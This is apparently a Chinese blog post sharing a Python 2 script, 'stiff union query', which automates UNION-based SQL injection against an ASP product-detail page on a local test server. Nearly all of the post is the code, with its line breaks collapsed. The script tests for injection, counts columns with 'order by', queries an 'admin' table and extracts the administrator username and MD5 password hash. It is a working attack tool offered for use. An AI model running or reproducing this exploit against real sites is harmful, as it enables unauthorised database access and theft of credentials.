僵硬的联合查询by-python

由于是对自己搭建的环境进行测试 所以觉得很僵硬 并且这个程序还没有爆破的功能，联合查询时只能用常用的 admin,password 这点以后有时间可以改进

注入点：

http://127.0.0.1:81/0/Production/PRODUCT_DETAIL.asp?id=1513

上代码吧：

#coding:utf-8import requestsimport res=requests.session()url1='http://127.0.0.1:81/0/Production/PRODUCT_DETAIL.asp?id=1513 'def order_by(url1):#判断有多少字段    for i in range(1,100):        url = url1+'order by '+str(i)        r=s.get(url,timeout=2)        if r.status_code!=200:            return i            breakdef point_(url1):#判断是否可注入    url_t=url1+' and 1=1'    url_f=url1+' and 1=2'    r1=requests.get(url_t)    r2=requests.get(url_f)    if r1.status_code!=r2.status_code:        print '存在注入'    return 1def biaodashi(url1,j): #组合形成查询表达式    key='1'    f=1    for f in range(2,j):        key=key+','+str(f)    return keytry:    if point_(url1)==1:        order_by=order_by(url1=url1)        biaodashi=biaodashi(url1=url1,j=order_by)        yuju='union select '+biaodashi+' from admin'        url=url1+yuju        r=requests.get(url).content    #<td height="20" width="663">3</td>        pattern=re.compile('<td height="20" width="663">(.*?)</td>')        L1=re.search(pattern,r).group(1)        sql=url.replace(','+L1,',admin')        r = requests.get(sql).content        pattern = re.compile('<td height="20" width="663">(.*?)</td>')        username= re.search(pattern, r).group(1)        print 'username:'+username        sql2=url.replace(','+L1,',password')        r = requests.get(sql2).content        password=re.search(pattern, r).group(1)        print 'password:'+password+'------(md5)'    else:        print '不存在注入点'except:    pass